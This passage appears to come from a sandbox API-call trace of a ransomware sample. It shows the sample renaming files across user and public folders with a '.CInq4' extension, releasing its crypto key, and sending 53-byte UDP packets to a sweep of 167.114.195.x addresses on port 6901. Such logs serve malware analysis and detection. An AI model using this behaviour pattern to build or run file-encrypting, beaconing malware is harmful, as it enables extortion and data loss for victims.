(lpExistingFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\xZwNFgm.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\xzwnfgm.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\xZwNFgm.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\xzwnfgm.bmp.cinq4")) returned 1 [0045.933] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\pictures\\desktop.ini.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\desktop.ini.cinq4")) returned 1 [0045.936] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\gODSMCuUdn.png" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\godsmcuudn.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\gODSMCuUdn.png.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\godsmcuudn.png.cinq4")) returned 1 [0045.939] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\nukHOa.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\nukhoa.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\nukHOa.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\nukhoa.bmp.cinq4")) returned 1 [0045.945] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\oyfK.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\oyfk.jpg"), lpNewFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\oyfK.jpg.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\oyfk.jpg.cinq4")) returned 1 [0045.948] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\QZ9j-.png" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\qz9j-.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\QZ9j-.png.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\qz9j-.png.cinq4")) returned 1 [0045.952] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\vix_gezF8ko-.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\vix_gezf8ko-.jpg"), lpNewFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\vix_gezF8ko-.jpg.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\vix_gezf8ko-.jpg.cinq4")) returned 1 [0045.956] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\WCugqKk5RxlbTM4reDQ.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\wcugqkk5rxlbtm4redq.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\WCugqKk5RxlbTM4reDQ.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\wcugqkk5rxlbtm4redq.bmp.cinq4")) returned 1 [0045.958] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\xDaqfb 0FFb.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\xdaqfb 0ffb.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\xDaqfb 0FFb.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\xdaqfb 0ffb.bmp.cinq4")) returned 1 [0045.966] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\EVfHSEpo11eW5.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\evfhsepo11ew5.jpg"), lpNewFileName="c:\\users\\eebsym5\\pictures\\EVfHSEpo11eW5.jpg.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\evfhsepo11ew5.jpg.cinq4")) returned 1 [0045.971] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\HGk7Np.png" (normalized: "c:\\users\\eebsym5\\pictures\\hgk7np.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\HGk7Np.png.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\hgk7np.png.cinq4")) returned 1 [0045.973] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\k8Qcy.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\k8qcy.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\k8Qcy.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\k8qcy.bmp.cinq4")) returned 1 [0045.975] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\Qcf9.png" (normalized: "c:\\users\\eebsym5\\pictures\\qcf9.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\Qcf9.png.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\qcf9.png.cinq4")) returned 1 [0045.978] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\wYpBBPn78QvIX3mzHn.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\wypbbpn78qvix3mzhn.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\wYpBBPn78QvIX3mzHn.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\wypbbpn78qvix3mzhn.bmp.cinq4")) returned 1 [0045.980] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\saved games\\desktop.ini" (normalized: "c:\\users\\eebsym5\\saved games\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\saved games\\desktop.ini.CInq4" (normalized: "c:\\users\\eebsym5\\saved games\\desktop.ini.cinq4")) returned 1 [0046.062] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\searches\\desktop.ini" (normalized: "c:\\users\\eebsym5\\searches\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\searches\\desktop.ini.CInq4" (normalized: "c:\\users\\eebsym5\\searches\\desktop.ini.cinq4")) returned 1 [0046.070] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\0PzVf.mp4" (normalized: "c:\\users\\eebsym5\\videos\\0pzvf.mp4"), lpNewFileName="c:\\users\\eebsym5\\videos\\0PzVf.mp4.CInq4" (normalized: "c:\\users\\eebsym5\\videos\\0pzvf.mp4.cinq4")) returned 1 [0046.072] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\6aDouzMxOw3ef7DSP-.mp4" (normalized: "c:\\users\\eebsym5\\videos\\6adouzmxow3ef7dsp-.mp4"), lpNewFileName="c:\\users\\eebsym5\\videos\\6aDouzMxOw3ef7DSP-.mp4.CInq4" (normalized: "c:\\users\\eebsym5\\videos\\6adouzmxow3ef7dsp-.mp4.cinq4")) returned 1 [0046.077] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\AvIK.swf" (normalized: "c:\\users\\eebsym5\\videos\\avik.swf"), lpNewFileName="c:\\users\\eebsym5\\videos\\AvIK.swf.CInq4" (normalized: "c:\\users\\eebsym5\\videos\\avik.swf.cinq4")) returned 1 [0046.084] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\iJcUEX2RgIDZ.mp4" (normalized: "c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\ijcuex2rgidz.mp4"), lpNewFileName="c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\iJcUEX2RgIDZ.mp4.CInq4" (normalized: "c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\ijcuex2rgidz.mp4.cinq4")) returned 1 [0046.092] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\s1xagxh3n\\jXhmIqDeW.swf" (normalized: "c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\s1xagxh3n\\jxhmiqdew.swf"), lpNewFileName="c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\s1xagxh3n\\jXhmIqDeW.swf.CInq4" (normalized: "c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\s1xagxh3n\\jxhmiqdew.swf.cinq4")) returned 1 [0046.095] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\s1xagxh3n\\q5GYI.swf" (normalized: "c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\s1xagxh3n\\q5gyi.swf"), lpNewFileName="c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\s1xagxh3n\\q5GYI.swf.CInq4" (normalized: "c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\s1xagxh3n\\q5gyi.swf.cinq4")) returned 1 [0046.100] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\desktop.ini" (normalized: "c:\\users\\eebsym5\\videos\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\videos\\desktop.ini.CInq4" (normalized: "c:\\users\\eebsym5\\videos\\desktop.ini.cinq4")) returned 1 [0046.102] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\o1Ccz.swf" (normalized: "c:\\users\\eebsym5\\videos\\o1ccz.swf"), lpNewFileName="c:\\users\\eebsym5\\videos\\o1Ccz.swf.CInq4" (normalized: "c:\\users\\eebsym5\\videos\\o1ccz.swf.cinq4")) returned 1 [0046.107] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\B32hiOe.swf" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\b32hioe.swf"), lpNewFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\B32hiOe.swf.CInq4" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\b32hioe.swf.cinq4")) returned 1 [0046.112] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\cxb6_or2bF.swf" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\cxb6_or2bf.swf"), lpNewFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\cxb6_or2bF.swf.CInq4" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\cxb6_or2bf.swf.cinq4")) returned 1 [0046.115] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\d1nH 3xB2.swf" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\d1nh 3xb2.swf"), lpNewFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\d1nH 3xB2.swf.CInq4" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\d1nh 3xb2.swf.cinq4")) returned 1 [0046.117] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\IXPFlcjz_LESFm.mp4" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\ixpflcjz_lesfm.mp4"), lpNewFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\IXPFlcjz_LESFm.mp4.CInq4" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\ixpflcjz_lesfm.mp4.cinq4")) returned 1 [0046.121] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\TwLl1bqJZc.swf" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\twll1bqjzc.swf"), lpNewFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\TwLl1bqJZc.swf.CInq4" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\twll1bqjzc.swf.cinq4")) returned 1 [0046.123] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\vbM81.mp4" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\vbm81.mp4"), lpNewFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\vbM81.mp4.CInq4" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\vbm81.mp4.cinq4")) returned 1 [0046.127] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\vUstnWNlj2UXr.mp4" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\vustnwnlj2uxr.mp4"), lpNewFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\vUstnWNlj2UXr.mp4.CInq4" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\vustnwnlj2uxr.mp4.cinq4")) returned 1 [0046.134] MoveFileW (lpExistingFileName="c:\\users\\public\\desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), lpNewFileName="c:\\users\\public\\desktop\\desktop.ini.CInq4" (normalized: "c:\\users\\public\\desktop\\desktop.ini.cinq4")) returned 1 [0046.142] MoveFileW (lpExistingFileName="c:\\users\\public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), lpNewFileName="c:\\users\\public\\desktop.ini.CInq4" (normalized: "c:\\users\\public\\desktop.ini.cinq4")) returned 1 [0046.149] MoveFileW (lpExistingFileName="c:\\users\\public\\documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), lpNewFileName="c:\\users\\public\\documents\\desktop.ini.CInq4" (normalized: "c:\\users\\public\\documents\\desktop.ini.cinq4")) returned 1 [0046.154] MoveFileW (lpExistingFileName="c:\\users\\public\\downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), lpNewFileName="c:\\users\\public\\downloads\\desktop.ini.CInq4" (normalized: "c:\\users\\public\\downloads\\desktop.ini.cinq4")) returned 1 [0046.201] MoveFileW (lpExistingFileName="c:\\users\\public\\libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), lpNewFileName="c:\\users\\public\\libraries\\desktop.ini.CInq4" (normalized: "c:\\users\\public\\libraries\\desktop.ini.cinq4")) returned 1 [0046.211] MoveFileW (lpExistingFileName="c:\\users\\public\\music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), lpNewFileName="c:\\users\\public\\music\\desktop.ini.CInq4" (normalized: "c:\\users\\public\\music\\desktop.ini.cinq4")) returned 1 [0046.232] MoveFileW (lpExistingFileName="c:\\users\\public\\music\\sample music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), lpNewFileName="c:\\users\\public\\music\\sample music\\desktop.ini.CInq4" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini.cinq4")) returned 1 [0046.239] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), lpNewFileName="c:\\users\\public\\pictures\\desktop.ini.CInq4" (normalized: "c:\\users\\public\\pictures\\desktop.ini.cinq4")) returned 1 [0046.394] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Chrysanthemum.jpg.CInq4" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.cinq4")) returned 1 [0046.456] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Desert.jpg.CInq4" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.cinq4")) returned 1 [0046.495] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\desktop.ini.CInq4" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini.cinq4")) returned 1 [0046.899] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Hydrangeas.jpg.CInq4" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.cinq4")) returned 1 [0046.988] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Jellyfish.jpg.CInq4" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.cinq4")) returned 1 [0047.049] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Koala.jpg.CInq4" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.cinq4")) returned 1 [0047.135] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Lighthouse.jpg.CInq4" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.cinq4")) returned 1 [0047.275] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Penguins.jpg.CInq4" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.cinq4")) returned 1 [0047.329] MoveFileW (lpExistingFileName="c:\\users\\public\\pictures\\sample pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="c:\\users\\public\\pictures\\sample pictures\\Tulips.jpg.CInq4" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.cinq4")) returned 1 [0047.336] MoveFileW (lpExistingFileName="c:\\users\\public\\recorded tv\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), lpNewFileName="c:\\users\\public\\recorded tv\\desktop.ini.CInq4" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.cinq4")) returned 1 [0047.342] MoveFileW (lpExistingFileName="c:\\users\\public\\recorded tv\\sample media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini"), lpNewFileName="c:\\users\\public\\recorded tv\\sample media\\desktop.ini.CInq4" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini.cinq4")) returned 1 [0047.356] MoveFileW (lpExistingFileName="c:\\users\\public\\videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), lpNewFileName="c:\\users\\public\\videos\\desktop.ini.CInq4" (normalized: "c:\\users\\public\\videos\\desktop.ini.cinq4")) returned 1 [0047.369] MoveFileW (lpExistingFileName="c:\\users\\public\\videos\\sample videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), lpNewFileName="c:\\users\\public\\videos\\sample videos\\desktop.ini.CInq4" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini.cinq4")) returned 1 [0049.184] MoveFileW (lpExistingFileName="c:\\users\\public\\videos\\sample videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="c:\\users\\public\\videos\\sample videos\\Wildlife.wmv.CInq4" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.cinq4")) returned 1 [0049.186] CryptDestroyKey (hKey=0x37bd80) returned 1 [0049.186] CryptReleaseContext (hProv=0x38bc60, dwFlags=0x0) returned 1 [0090.385] GetExitCodeThread (in: hThread=0xc0, lpExitCode=0x1cf9f8 | out: lpExitCode=0x1cf9f8) returned 1 [0090.385] CloseHandle (hObject=0xc0) returned 1 [0090.385] GetCurrentThreadId () returned 0xa80 [0090.385] GetCurrentThreadId () returned 0xa80 [0090.386] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1cf618 | out: lpWSAData=0x1cf618) returned 0 [0090.389] socket (af=2, type=2, protocol=0) returned 0xc0 [0090.391] htons (hostshort=0x1af5) returned 0xf51a [0090.391] inet_addr (cp="167.114.194.225") returned 0xe1c272a7 [0090.391] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.225"), tolen=16 | out: buf=0x378070*) returned 53 [0090.392] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.226"), tolen=16 | out: buf=0x378070*) returned 53 [0090.392] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.227"), tolen=16 | out: buf=0x378070*) returned 53 [0090.392] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.228"), tolen=16 | out: buf=0x378070*) returned 53 [0090.392] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.229"), tolen=16 | out: buf=0x378070*) returned 53 [0090.392] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.230"), tolen=16 | out: buf=0x378070*) returned 53 [0090.392] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.231"), tolen=16 | out: buf=0x378070*) returned 53 [0090.392] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.232"), tolen=16 | out: buf=0x378070*) returned 53 [0090.393] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.233"), tolen=16 | out: buf=0x378070*) returned 53 [0090.393] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.234"), tolen=16 | out: buf=0x378070*) returned 53 [0090.393] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.235"), tolen=16 | out: buf=0x378070*) returned 53 [0090.393] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.236"), tolen=16 | out: buf=0x378070*) returned 53 [0090.393] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.237"), tolen=16 | out: buf=0x378070*) returned 53 [0090.393] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.238"), tolen=16 | out: buf=0x378070*) returned 53 [0090.393] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.239"), tolen=16 | out: buf=0x378070*) returned 53 [0090.393] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.240"), tolen=16 | out: buf=0x378070*) returned 53 [0090.394] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.241"), tolen=16 | out: buf=0x378070*) returned 53 [0090.394] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.242"), tolen=16 | out: buf=0x378070*) returned 53 [0090.394] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.243"), tolen=16 | out: buf=0x378070*) returned 53 [0090.394] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.244"), tolen=16 | out: buf=0x378070*) returned 53 [0090.394] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.245"), tolen=16 | out: buf=0x378070*) returned 53 [0090.394] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.246"), tolen=16 | out: buf=0x378070*) returned 53 [0090.395] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.247"), tolen=16 | out: buf=0x378070*) returned 53 [0090.395] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.248"), tolen=16 | out: buf=0x378070*) returned 53 [0090.395] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.249"), tolen=16 | out: buf=0x378070*) returned 53 [0090.395] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.250"), tolen=16 | out: buf=0x378070*) returned 53 [0090.395] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.251"), tolen=16 | out: buf=0x378070*) returned 53 [0090.395] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.252"), tolen=16 | out: buf=0x378070*) returned 53 [0090.395] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.253"), tolen=16 | out: buf=0x378070*) returned 53 [0090.396] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.254"), tolen=16 | out: buf=0x378070*) returned 53 [0090.396] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.1"), tolen=16 | out: buf=0x378070*) returned 53 [0090.396] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.2"), tolen=16 | out: buf=0x378070*) returned 53 [0090.396] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.3"), tolen=16 | out: buf=0x378070*) returned 53 [0090.396] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.4"), tolen=16 | out: buf=0x378070*) returned 53 [0090.396] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.5"), tolen=16 | out: buf=0x378070*) returned 53 [0090.397] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.6"), tolen=16 | out: buf=0x378070*) returned 53 [0090.397] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.7"), tolen=16 | out: buf=0x378070*) returned 53 [0090.397] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.8"), tolen=16 | out: buf=0x378070*) returned 53 [0090.397] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.9"), tolen=16 | out: buf=0x378070*) returned 53 [0090.397] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, to=0x1cf7ac*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.10"), tolen=16 | out: buf=0x378070*) returned 53 [0090.397] sendto (in: s=0xc0, buf=0x378070*, len=53, flags=0, 